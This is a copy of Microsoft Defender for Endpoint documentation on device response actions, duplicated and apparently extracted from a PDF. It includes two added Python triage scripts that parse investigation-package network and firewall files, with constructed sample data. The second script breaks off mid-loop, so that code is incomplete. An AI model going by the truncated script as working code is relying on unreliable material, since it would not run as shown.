Quickly respond to detected attacks by isolating devices or collecting an investigation package. After taking action on devices, you can check activity details on the Action center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file.

Microsoft Defender for Business does not include the "Stop and quarantine a file" action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation

You can start a new general purpose automated investigation on the device if needed. While an investigation is running, any other alert generated from the device will be added to an ongoing Automated investigation until that investigation is completed. In addition, if the same threat is seen on other devices, those devices are added to the investigation.

For more information on automated investigations, see Overview of Automated investigations.

Initiate live response session

Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices

As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top of the device page.
2. Specify in the text box why you want to perform this action. Select Confirm.
3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the device page.
2. Add comments and select Confirm.
3. Select Action center from the response actions section of the device page.
4. Click the Package collection package available to download the collection package.

For Windows devices, the package contains the following folders:

Autoruns: Contains a set of files that each represent the content of the registry of a known auto start entry point (ASEP) to help identify attacker's persistency on the device.
    NOTE: If the registry key is not found, the file will contain the following message: "ERROR: The system was unable to find the specified registry key or value."

Installed programs: This .CSV file contains the list of installed programs that can help identify what is currently installed on the device. For more information, see Win32_Product class.

Network connections: This folder contains a set of data points related to the connectivity information that can help in identifying connectivity to suspicious URLs, attacker's command and control (C&C) infrastructure, any lateral movement, or remote connections.
    ActiveNetConnections.txt: Displays protocol statistics and current TCP/IP network connections. Provides the ability to look for suspicious connectivity made by a process.
    Arp.txt: Displays the current address resolution protocol (ARP) cache tables for all interfaces. ARP cache can reveal other hosts on a network that have been compromised or suspicious systems on the network that might have been used to run an internal attack.
    DnsCache.txt: Displays the contents of the DNS client resolver cache, which includes both entries preloaded from the local Hosts file and any recently obtained resource records for name queries resolved by the computer. This can help in identifying suspicious connections.
    IpConfig.txt: Displays the full TCP/IP configuration for all adapters. Adapters can represent physical interfaces, such as installed network adapters, or logical interfaces, such as dial-up connections.
    FirewallExecutionLog.txt and pfirewall.log
    NOTE: The pfirewall.log file must exist in %windir%\system32\logfiles\firewall\pfirewall.log, so it will be included in the investigation package. For more information on creating the firewall log file, see Configure the Windows Defender Firewall with Advanced Security Log.

Prefetch files: Windows Prefetch files are designed to speed up the application startup process. They can be used to track all the files recently used in the system and find traces for applications that might have been deleted but can still be found in the prefetch file list.
    Prefetch folder: Contains a copy of the prefetch files from %SystemRoot%\Prefetch. NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.
    PrefetchFilesList.txt: Contains the list of all the copied files that can be used to track if there were any copy failures to the prefetch folder.

Processes: Contains a .CSV file listing the running processes and provides the ability to identify current processes running on the device. This can be useful when identifying a suspicious process and its state.

Scheduled tasks: Contains a .CSV file listing the scheduled tasks, which can be used to identify routines performed automatically on a chosen device to look for suspicious code that was set to run automatically.

Security event log: Contains the security event log, which contains records of login or logout activity, or other security-related events specified by the system's audit policy.
    NOTE: Open the event log file using Event viewer.

Services: Contains a .CSV file that lists services and their states.

Windows Server Message Block (SMB) sessions: Lists shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network. This can help identify data exfiltration or lateral movement. Contains files for SMBInboundSessions and SMBOutboundSession.
    NOTE: If there are no sessions (inbound or outbound), you'll get a text file that tells you that there are no SMB sessions found.

System Information: Contains a SystemInformation.txt file that lists system information such as OS version and network cards.

Temp Directories: Contains a set of text files that lists the files located in %Temp% for every user in the system. This can help to track suspicious files that an attacker may have dropped on the system.
    NOTE: If the file contains the following message: "The system cannot find the path specified", it means that there is no temp directory for this user, and might be because the user didn't log in to the system.

Users and Groups: Provides a list of files that each represent a group and its members.

WdSupportLogs: Provides the MpCmdRunLog.txt and MPSupportFiles.cab.
    NOTE: This folder will only be created on Windows 10, version 1709 or later with the February 2020 update rollup or more recent installed:
        Win10 1709 (RS3) Build 16299.1717: KB4537816
        Win10 1803 (RS4) Build 17134.1345: KB4537795
        Win10 1809 (RS5) Build 17763.1075: KB4537818
        Win10 1903/1909 (19h1/19h2) Builds 18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls: This file is a summary of the investigation package collection. It contains the list of data points, the command used to extract the data, the execution status, and the error code if there is a failure. You can use this report to track if the package includes all the expected data and identify if there were any errors.
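The Network connections and Processes folders described above are the first things an analyst joins together when triaging a package. The following Python script is an added example, not Microsoft's code and not something the package ships with: it parses a netstat -ano style ActiveNetConnections.txt and the Processes .CSV, joins them on PID, and lists established connections to hosts outside RFC 1918, loopback and link-local ranges. The netstat layout and the CSV column names (Name, PID, Path) are assumptions, and the sample inputs are constructed, using RFC 5737 documentation addresses in place of internet hosts.

```python
"""Triage helper for a Defender for Endpoint investigation package.

Added example, not part of the Microsoft documentation or product. Assumptions:
  * ActiveNetConnections.txt has "netstat -ano" style rows
    (Proto, Local Address, Foreign Address, State, PID).
  * The Processes .CSV has at least the columns Name, PID and Path
    (the page only says the file lists running processes).
"""
import csv
import io
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample of ActiveNetConnections.txt. The remote hosts use
# RFC 5737 documentation ranges (203.0.113.0/24, 198.51.100.0/24) to stand in
# for internet addresses.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    10.0.0.5:49712         203.0.113.7:443        ESTABLISHED     4120
  TCP    10.0.0.5:49801         10.0.0.9:445           ESTABLISHED     4
  TCP    10.0.0.5:49855         198.51.100.23:4444     ESTABLISHED     5532
  TCP    [::1]:49700            [::1]:49701            ESTABLISHED     3200
  UDP    0.0.0.0:5353           *:*                                    2244
"""

# Constructed sample of the Processes .CSV (column names assumed).
SAMPLE_PROCESSES_CSV = """Name,PID,Path
System,4,
svchost.exe,912,C:\\Windows\\System32\\svchost.exe
msedge.exe,4120,C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
powershell.exe,5532,C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
outlook.exe,3200,C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE
"""

# Ranges that are never "the internet": RFC 1918, loopback, link-local, ULA.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fe80::/10", "fc00::/7")]

# One netstat row: proto, local, remote, optional state (UDP has none), PID.
NETSTAT_ROW = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:([A-Z_]+)\s+)?(\d+)\s*$")


@dataclass(frozen=True)
class Connection:
    proto: str
    local: str
    remote: str
    state: str   # "" for UDP rows
    pid: int


def parse_netstat(text: str) -> list[Connection]:
    """Return one Connection per netstat row; headers and blanks are skipped."""
    rows = []
    for line in text.splitlines():
        m = NETSTAT_ROW.match(line)
        if m:
            proto, local, remote, state, pid = m.groups()
            rows.append(Connection(proto, local, remote, state or "", int(pid)))
    return rows


def parse_processes(csv_text: str) -> dict[int, dict]:
    """Map PID -> CSV row so connections can be attributed to a process."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return {int(r["PID"]): r for r in reader if r["PID"].strip().isdigit()}


def split_endpoint(endpoint: str) -> tuple[str, str]:
    """'203.0.113.7:443' -> ('203.0.113.7', '443'); '[::1]:49701' -> ('::1', '49701')."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port


def is_internal(host: str) -> bool:
    """True for private/loopback/link-local hosts and for wildcards like '*'."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True
    return any(addr in net for net in INTERNAL_NETS)


def external_established(conns, procs) -> list[dict]:
    """Established connections to non-internal hosts, attributed to their process.

    A PID missing from the Processes CSV (process exited between the two
    captures) is reported rather than dropped, since that gap is itself a lead.
    """
    findings = []
    for c in conns:
        host, _ = split_endpoint(c.remote)
        if c.state != "ESTABLISHED" or is_internal(host):
            continue
        proc = procs.get(c.pid)
        findings.append({
            "pid": c.pid,
            "process": proc["Name"] if proc else "<not in Processes csv>",
            "path": proc.get("Path", "") if proc else "",
            "local": c.local,
            "remote": c.remote,
        })
    return findings


if __name__ == "__main__":
    hits = external_established(parse_netstat(SAMPLE_NETSTAT),
                                parse_processes(SAMPLE_PROCESSES_CSV))
    for h in hits:
        print(f"PID {h['pid']:>6} {h['process']:<16} {h['local']} -> {h['remote']}")
```

On a real package, read the two files out of the downloaded Zip and pass their text to the same functions; the attribution is only as good as the two captures being taken close together, which is why missing PIDs are surfaced rather than hidden.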

The collection packages for macOS and Linux devices contain the following:


Applications
    macOS: A list of all installed applications
    Linux: Not applicable

Disk volume
    macOS: Amount of free space; list of all mounted disk volumes; list of all partitions
    Linux: Amount of free space; list of all mounted disk volumes; list of all partitions

File
    macOS: A list of all open files with the corresponding processes using these files
    Linux: A list of all open files with the corresponding processes using these files

History
    macOS: Shell history
    Linux: Not applicable

Kernel modules
    macOS: All loaded modules
    Linux: Not applicable

Network connections
    macOS: Active connections; active listening connections; ARP table; firewall rules; interface configuration; proxy settings; VPN settings
    Linux: Active connections; active listening connections; ARP table; firewall rules; IP list; proxy settings

Processes
    macOS: A list of all running processes
    Linux: A list of all running processes

Services and scheduled tasks
    macOS: Certificates; configuration profiles; hardware information
    Linux: CPU details; hardware information; operating system information

System security information
    macOS: Extensible Firmware Interface (EFI) integrity information; firewall status; Malware Removal Tool (MRT) information; System Integrity Protection (SIP) status
    Linux: Not applicable

Users and groups
    macOS: Login history; sudoers
    Linux: Login history; sudoers

Run Microsoft Defender Antivirus scan on devices

As part of the investigation or response process, you can remotely initiate an antivirus
scan to help identify and remediate malware that might be present on a compromised
device.

Important

This action is supported for macOS and Linux for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Microsoft Defender Antivirus is the active antivirus solution or not. Microsoft Defender Antivirus can be in Passive mode. For more information, see Microsoft Defender Antivirus compatibility.

Once you have selected Run antivirus scan, select the scan type that you'd like to run
(quick or full) and add a comment before confirming the scan.

The Action center will show the scan information and the device timeline will include a
new event, reflecting that a scan action was submitted on the device. Microsoft
Defender Antivirus alerts will reflect any detections that surfaced during the scan.

Note

When triggering a scan using the Defender for Endpoint response action, the Microsoft Defender Antivirus 'ScanAvgCPULoadFactor' value still applies and limits the CPU impact of the scan. If ScanAvgCPULoadFactor is not configured, the default value is a limit of 50% maximum CPU load during a scan. For more information, see configure-advanced-scan-types-microsoft-defender-antivirus.

Restrict app execution

In addition to containing an attack by stopping malicious processes, you can also lock
down a device and prevent subsequent attempts of potentially malicious programs from
running.

Important

This action is available for devices on Windows 10, version 1709 or later, Windows 11, and Windows Server 2019 or later.
This feature is available if your organization uses Microsoft Defender Antivirus.
This action needs to meet the Windows Defender Application Control code integrity policy formats and signing requirements. For more information, see Code integrity policy formats and signing.

To restrict an application from running, a code integrity policy is applied that only allows
files to run if they are signed by a Microsoft issued certificate. This method of restriction
can help prevent an attacker from controlling compromised devices and performing
further malicious activities.

Note

You'll be able to reverse the restriction of applications from running at any time.
The button on the device page will change to say Remove app restrictions, and
then you take the same steps as restricting app execution.

Once you have selected Restrict app execution on the device page, type a comment
and select Confirm. The Action center will show the scan information and the device
timeline will include a new event.

Notification on device user

When an app is restricted, the following notification is displayed to inform the user that
an app is being restricted from running:

Note

The notification is not available on Windows Server 2016 and Windows Server 2012
R2.

Isolate devices from the network

Depending on the severity of the attack and the sensitivity of the device, you might
want to isolate the device from the network. This action can help prevent the attacker
from controlling the compromised device and performing further activities such as data
exfiltration and lateral movement.

Important

Isolating devices from the network is supported for macOS for client version 101.98.84 and above. You can also use live response to run the action. For more information on live response, see Investigate entities on devices using live response.
Full isolation is available for devices running Windows 11, Windows 10, version 1703 or later, Windows Server 2022, Windows Server 2019, Windows Server 2016 and Windows Server 2012 R2.
You can use the device isolation capability on all supported versions of Microsoft Defender for Endpoint on Linux listed in System requirements. Ensure that the following prerequisites are enabled: iptables, ip6tables, and a Linux kernel with CONFIG_NETFILTER, CONFIG_IP_NF_IPTABLES, and CONFIG_IP_NF_MATCH_OWNER.
Selective isolation is available for devices running Windows 10, version 1709 or later, and Windows 11.
When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
The feature supports VPN connections.
You must have at least one of the following role permissions: 'Active remediation actions'. For more information, see Create and manage roles.
You must have access to the device based on the device group settings. For more information, see Create and manage device groups.
Exclusions for both macOS and Linux isolation are not supported.
An isolated device is removed from isolation when an administrator modifies or adds a new iptables rule on the isolated device.
Isolating a server running on Microsoft Hyper-V blocks network traffic to all child virtual machines of the server.

This device isolation feature disconnects the compromised device from the network
while retaining connectivity to the Defender for Endpoint service, which continues to
monitor the device.

On Windows 10, version 1709 or later, you'll have more control over the network isolation level. You can also choose to enable Outlook, Microsoft Teams, and Skype for Business connectivity (also known as 'Selective Isolation').

Note

You'll be able to reconnect the device back to the network at any time. The button
on the device page will change to say Release from isolation, and then you take
the same steps as isolating the device.

Once you have selected Isolate device on the device page, type a comment and select
Confirm. The Action center will show the scan information and the device timeline will
include a new event.

Note

The device will remain connected to the Defender for Endpoint service even if it is
isolated from the network. If you've chosen to enable Outlook and Skype for
Business communication, then you'll be able to communicate to the user while the
device is isolated. Selective isolation only works on the classic versions of Outlook
and Microsoft Teams.

Forcibly release device from isolation


The device isolation feature is an invaluable tool for safeguarding devices against
external threats. However, there are instances when isolated devices become
unresponsive.
There's a downloadable script for these instances that you can run to forcibly release
devices from isolation. The script is available through a link in the UI.

7 Note

Admins and manage security settings in Security Center permissions can


forcibly release devices from isolation.
The script is valid for the specific device only.
The script will expire in three days.

To forcibly release device from isolation:

1. On the device page, select Download script to force-release a device from


isolation from the action menu.
2. On the right-hand side wizard, select Download script.

Minimum requirements
The minimum requirements for 'forcibly release device from isolation' feature are:

Supports only Windows


The following Windows versions are supported:
Windows 10 21H2 and 22H2 with KB KB5023773
Windows 11 version 21H2, all editions with KB5023774
Windows 11 version 22H2, all editions with KB5023778

Notification on device user


When a device is being isolated, the following notification is displayed to inform the
user that the device is being isolated from the network:

7 Note

The notification is not available on non-Windows platforms.

Contain devices from the network


When you have identified an unmanaged device that is compromised or potentially
compromised, you might want to contain that device from the network. When you
contain a device any Microsoft Defender for Endpoint onboarded device will block
incoming and outgoing communication with that device. This action can help prevent
neighboring devices from becoming compromised while the security operations analyst
locates, identifies, and remediates the threat on the compromised device.

7 Note

Blocking incoming and outgoing communication with a 'contained' device is


supported on onboarded Microsoft Defender for Endpoint Windows 10 and
Windows Server 2019+ devices.

How to contain a device


1. Go to the Device inventory page and select the device to contain.

2. Select Contain device from the actions menu in the device flyout.

3. On the contain device popup, type a comment, and select Confirm.


Contain a device from the device page


A device can also be contained from the device page by selecting Contain device from
the action bar:

7 Note
It can take up to 5 minutes for the details about a newly contained device to reach
Microsoft Defender for Endpoint onboarded devices.

) Important

If a contained device changes its IP address, then all Microsoft Defender for
Endpoint onboarded devices will recognize this and start blocking
communications with the new IP address. The original IP address will no
longer be blocked (It may take up to 5 mins to see these changes).
In cases where the contained device's IP is used by another device on the
network, there will be a warning while containing the device, with a link to
advanced hunting (with a pre-populated query). This will provide visibility to
the other devices using the same IP to help you make a conscious decision if
you'd like to continue with containing the device.
In cases where the contained device is a network device, a warning will appear
with a message that this may cause network connectivity issues (for example,
containing a router that is acting as a default gateway). At this point, you'll be
able to choose whether to contain the device or not.

After you contain a device, if the behavior isn't as expected, verify the Base Filtering
Engine (BFE) service is enabled on the Defender for Endpoint onboarded devices.

Stop containing a device


You'll be able to stop containing a device at any time.

1. Select the device from the Device inventory or open the device page.

2. Select Release from containment from the action menu. This action will restore
this device's connection to the network.

Contain user from the network


When an identity in your network might be compromised, you must prevent that
identity from accessing the network and different endpoints. Defender for Endpoint can
"contain" an identity, blocking it from access, and helping prevent attacks-- specifically,
ransomware. When an identity is contained, any supported Microsoft Defender for
Endpoint onboarded device will block incoming traffic in specific protocols related to
attacks (network logons, RPC, SMB, RDP) while enabling legitimate traffic. This action
can significantly help to reduce the impact of an attack. When an identity is contained,
security operations analysts have extra time to locate, identify and remediate the threat
to the compromised identity.

7 Note

Blocking incoming communication with a "contained" user is supported on


onboarded Microsoft Defender for Endpoint Windows 10 and 11 devices (Sense
version 8740 and higher), Windows Server 2019+ devices, and Windows Servers
2012R2 and 2016 with the modern agent.

How to contain a user


Currently, containing users is only available automatically by using automatic attack
disruption. When Microsoft detects a user as being compromised a "Contain User"
policy is automatically set.

View the contain user actions


After a user is contained, you can view the action in this History view of the Action
Center. Here, you can see when the action occurred, and which users in your
organization were contained:

Furthermore, after an identity is considered "contained", that user will be blocked by


Defender for Endpoint and cannot perform any malicious lateral movement or remote
encryption on or to any supported Defender for Endpoint onboarded device. These
blocks will show up as alerts to help you quickly see the devices the compromised user
attempted access and potential attack techniques:

Undo contain user actions


You can release the blocks and containment on a user at any time:

1. Select the Contain User action in the Action Center. In the side pane select Undo
2. Select the user from either the user inventory, Incident page side pane or alert side
pane and select Undo

This action will restore this user's connection to the network.

Investigation capabilities with Contain User


After a user is contained, you can investigate the potential threat by viewing the blocked
actions by the compromised user. In the Device timeline view, you can see information
about specific events, including protocol and interface granularity, and the relevant
MITRE Technique associated it.

In addition, you can expand the investigation by using Advanced Hunting. Look for any
"Action Type" starting with "Contain" in the "DeviceEvents" table. Then, you can view all
the different singular blocking events in relation to Contain User in your tenant, dive
deeper into the context of each block, and extract the different entities and techniques
associated with those events.

Consult a threat expert


You can consult a Microsoft threat expert for more insights regarding a potentially
compromised device or already compromised ones. Microsoft Threat Experts can be
engaged directly from within the Microsoft Defender XDR for timely and accurate
response. Experts provide insights not just regarding a potentially compromised device,
but also to better understand complex threats, targeted attack notifications that you
get, or if you need more information about the alerts, or a threat intelligence context
that you see on your portal dashboard.

See Consult a Microsoft Threat Expert for details.

Check activity details in Action center


The Action center provides information on actions that were taken on a device or file.
You'll be able to view the following details:

Investigation package collection


Antivirus scan
App restriction
Device isolation

All other related details are also shown, for example, submission date/time, submitting
user, and if the action succeeded or failed.

See also
Take response actions on a file
Manual response actions in Microsoft Defender for Endpoint Plan 1
Report inaccuracy

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .

Feedback
Was this page helpful?  Yes  No

Provide product feedback


Take response actions on a device
Article • 12/15/2023

Applies to:

Microsoft Defender for Endpoint Plans 1 and 2
Microsoft Defender for Business

) Important

Some information in this article relates to prerelease product, which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Quickly respond to detected attacks by isolating devices or collecting an investigation
package. After taking action on devices, you can check activity details in the Action
center.

Response actions run along the top of a specific device page and include:

Manage tags
Initiate Automated Investigation
Initiate Live Response Session
Collect investigation package
Run antivirus scan
Restrict app execution
Isolate device
Contain device
Consult a threat expert
Action center

) Important

Defender for Endpoint Plan 1 includes only the following manual response actions:

Run antivirus scan
Isolate device
Stop and quarantine a file
Add an indicator to block or allow a file

Microsoft Defender for Business does not include the "Stop and quarantine a file"
action at this time.

Your subscription must include Defender for Endpoint Plan 2 to have all of the
response actions described in this article.

You can find device pages from any of the following views:

Alerts queue - Select the device name beside the device icon from the alerts
queue.
Devices list - Select the heading of the device name from the devices list.
Search box - Select Device from the drop-down menu and enter the device name.

) Important

For information on availability and support for each response action, please refer to
the supported/minimum operating system requirements found under each feature.

Manage tags
Add or manage tags to create a logical group affiliation. Device tags support proper
mapping of the network, enabling you to attach different tags to capture context and to
enable dynamic list creation as part of an incident.

For more information on device tagging, see Create and manage device tags.

Initiate Automated Investigation

You can start a new general-purpose automated investigation on the device if needed.
While an investigation is running, any other alert generated from the device will be
added to the ongoing automated investigation until that investigation is completed. In
addition, if the same threat is seen on other devices, those devices are added to the
investigation.

For more information on automated investigations, see Overview of Automated
investigations.

Initiate live response session

Live response is a capability that gives you instantaneous access to a device by using a
remote shell connection. This gives you the power to do in-depth investigative work and
take immediate response actions to promptly contain identified threats in real time.

Live response is designed to enhance investigations by enabling you to collect forensic
data, run scripts, send suspicious entities for analysis, remediate threats, and proactively
hunt for emerging threats.

For more information on live response, see Investigate entities on devices using live
response.

Collect investigation package from devices

As part of the investigation or response process, you can collect an investigation
package from a device. By collecting the investigation package, you can identify the
current state of the device and further understand the tools and techniques used by the
attacker.

To download the package (Zip file) and investigate the events that occurred on a device:

1. Select Collect investigation package from the row of response actions at the top
of the device page.

2. Specify in the text box why you want to perform this action. Select Confirm.

3. The zip file downloads.

Alternate steps:

1. Select Collect Investigation Package from the response actions section of the
device page.

2. Add comments and select Confirm.

3. Select Action center from the response actions section of the device page.

4. Select Package collection package available to download the collection
package.

For Windows devices, the package contains the following folders:

Folder: Description

Autoruns: Contains a set of files that each represent the content of the registry of a
known auto start entry point (ASEP), to help identify the attacker's persistence on the
device.
NOTE: If the registry key is not found, the file will contain the following message:
"ERROR: The system was unable to find the specified registry key or value."

Installed programs: This .CSV file contains the list of installed programs, which can help
identify what is currently installed on the device. For more information, see
Win32_Product class.

Network connections: This folder contains a set of data points related to connectivity
information that can help in identifying connectivity to suspicious URLs, the attacker's
command and control (C&C) infrastructure, any lateral movement, or remote
connections.
  ActiveNetConnections.txt: Displays protocol statistics and current TCP/IP network
  connections. Provides the ability to look for suspicious connectivity made by a
  process.
  Arp.txt: Displays the current address resolution protocol (ARP) cache tables for all
  interfaces. The ARP cache can reveal other hosts on a network that have been
  compromised, or suspicious systems on the network that might have been used to
  run an internal attack.
  DnsCache.txt: Displays the contents of the DNS client resolver cache, which includes
  both entries preloaded from the local Hosts file and any recently obtained resource
  records for name queries resolved by the computer. This can help in identifying
  suspicious connections.
  IpConfig.txt: Displays the full TCP/IP configuration for all adapters. Adapters can
  represent physical interfaces, such as installed network adapters, or logical
  interfaces, such as dial-up connections.
  FirewallExecutionLog.txt and pfirewall.log.
  NOTE: The pfirewall.log file must exist in
  %windir%\system32\logfiles\firewall\pfirewall.log so that it is included in the
  investigation package. For more information on creating the firewall log file, see
  Configure the Windows Defender Firewall with Advanced Security Log.

Prefetch files: Windows Prefetch files are designed to speed up the application startup
process. They can be used to track all the files recently used in the system and find
traces of applications that might have been deleted but can still be found in the
prefetch file list.
  Prefetch folder: Contains a copy of the prefetch files from %SystemRoot%\Prefetch.
  NOTE: It is suggested to download a prefetch file viewer to view the prefetch files.
  PrefetchFilesList.txt: Contains the list of all the copied files, which can be used to
  track whether there were any copy failures to the prefetch folder.

Processes: Contains a .CSV file listing the running processes and provides the ability to
identify current processes running on the device. This can be useful when identifying a
suspicious process and its state.

Scheduled tasks: Contains a .CSV file listing the scheduled tasks, which can be used to
identify routines performed automatically on a chosen device to look for suspicious
code that was set to run automatically.

Security event log: Contains the security event log, which contains records of login or
logout activity, or other security-related events specified by the system's audit policy.
NOTE: Open the event log file using Event Viewer.

Services: Contains a .CSV file that lists services and their states.

Windows Server Message Block (SMB) sessions: Lists shared access to files, printers, and
serial ports and miscellaneous communications between nodes on a network. This can
help identify data exfiltration or lateral movement. Contains files for
SMBInboundSessions and SMBOutboundSession.
NOTE: If there are no sessions (inbound or outbound), you'll get a text file that tells you
that there are no SMB sessions found.

System Information: Contains a SystemInformation.txt file that lists system information
such as OS version and network cards.

Temp Directories: Contains a set of text files that list the files located in %Temp% for
every user in the system. This can help to track suspicious files that an attacker may
have dropped on the system.
NOTE: If the file contains the following message: "The system cannot find the path
specified", it means that there is no temp directory for this user, which might be
because the user didn't log in to the system.

Users and Groups: Provides a list of files that each represent a group and its members.

WdSupportLogs: Provides the MpCmdRunLog.txt and MPSupportFiles.cab.
NOTE: This folder will only be created on Windows 10, version 1709 or later with the
February 2020 update rollup or more recent installed:
  Win10 1709 (RS3) Build 16299.1717: KB4537816
  Win10 1803 (RS4) Build 17134.1345: KB4537795
  Win10 1809 (RS5) Build 17763.1075: KB4537818
  Win10 1903/1909 (19h1/19h2) Builds 18362.693 and 18363.693: KB4535996

CollectionSummaryReport.xls: This file is a summary of the investigation package
collection. It contains the list of data points, the command used to extract the data, the
execution status, and the error code if there is a failure. You can use this report to track
whether the package includes all the expected data and identify whether there were any
errors.
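Two of the Network connections files listed above lend themselves to quick offline triage before anything is opened in a viewer. The Python script below is an added example written for this page; it is not Microsoft's code and not a tool shipped in the package. It assumes ActiveNetConnections.txt is `netstat -ano`-style output and that pfirewall.log uses the standard Windows Firewall log layout with a `#Fields:` header, and the two file contents embedded in it are constructed samples (addresses, PIDs and timestamps are invented). It lists ESTABLISHED connections to routable (non-private) addresses per PID, which you would then match against the Processes .CSV in the same package, and counts inbound DROP entries per source host and destination port from the firewall log.

```python
"""Offline triage of two Network connections files from an investigation package.

Added example for this page (not Microsoft code). Assumes ActiveNetConnections.txt
is `netstat -ano`-style output and pfirewall.log uses the standard Windows Firewall
log layout with a `#Fields:` header. Both samples below are constructed.
"""
import ipaddress
from collections import Counter, defaultdict

# Constructed sample of ActiveNetConnections.txt (netstat -ano layout assumed).
ACTIVE_NET_CONNECTIONS = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    10.0.0.5:49710         52.96.12.34:443        ESTABLISHED     4312
  TCP    10.0.0.5:49722         10.0.0.7:445           ESTABLISHED     4
  TCP    10.0.0.5:49731         104.21.5.9:8443        ESTABLISHED     7788
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1120
  UDP    0.0.0.0:5353           *:*                                    2204
"""

# Constructed sample of pfirewall.log (header lines, then one entry per line).
PFIREWALL_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-01-15 10:01:02 DROP TCP 10.0.0.9 10.0.0.5 51234 445 52 S 123456 0 8192 - - - RECEIVE
2024-01-15 10:01:03 DROP TCP 10.0.0.9 10.0.0.5 51235 3389 52 S 123457 0 8192 - - - RECEIVE
2024-01-15 10:01:05 ALLOW TCP 10.0.0.5 52.96.12.34 49710 443 0 - 0 0 0 - - - SEND
2024-01-15 10:01:09 DROP TCP 10.0.0.9 10.0.0.5 51236 445 52 S 123458 0 8192 - - - RECEIVE
"""


def split_endpoint(endpoint):
    """Split 'ip:port' or '[ipv6]:port' into (ip, port), both as strings."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), port


def parse_netstat(text):
    """Return one dict per TCP/UDP row of netstat -ano output; other lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            proto, local, foreign, state, pid = parts[:5]
        else:  # UDP rows carry no State column
            proto, local, foreign, pid = parts[:4]
            state = ""
        rows.append({"proto": proto, "local": local, "foreign": foreign,
                     "state": state, "pid": int(pid)})
    return rows


def is_routable(ip):
    """True only for globally routable addresses; '*', private, loopback etc. are False."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def external_connections_by_pid(text):
    """Map PID -> sorted 'ip:port' list of ESTABLISHED connections to routable addresses.

    Match the PIDs against the Processes .CSV in the same package to name the process.
    """
    result = defaultdict(list)
    for row in parse_netstat(text):
        if row["state"] != "ESTABLISHED":
            continue
        ip, port = split_endpoint(row["foreign"])
        if is_routable(ip):
            result[row["pid"]].append(f"{ip}:{port}")
    return {pid: sorted(targets) for pid, targets in result.items()}


def parse_pfirewall(text):
    """Parse pfirewall.log using its own #Fields header; returns a list of dicts."""
    fields, entries = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            entries.append(dict(zip(fields, line.split())))
    return entries


def dropped_inbound_by_source(text):
    """Count DROP entries on the RECEIVE path per (src-ip, dst-port).

    Repeated drops from one neighbour against 445 or 3389 are the pattern to
    correlate with lateral-movement alerts involving that host.
    """
    counts = Counter()
    for entry in parse_pfirewall(text):
        if entry.get("action") == "DROP" and entry.get("path") == "RECEIVE":
            counts[(entry["src-ip"], entry["dst-port"])] += 1
    return dict(counts)


if __name__ == "__main__":
    for pid, targets in external_connections_by_pid(ACTIVE_NET_CONNECTIONS).items():
        print(f"PID {pid} -> {', '.join(targets)}")
    for (src, port), n in sorted(dropped_inbound_by_source(PFIREWALL_LOG).items()):
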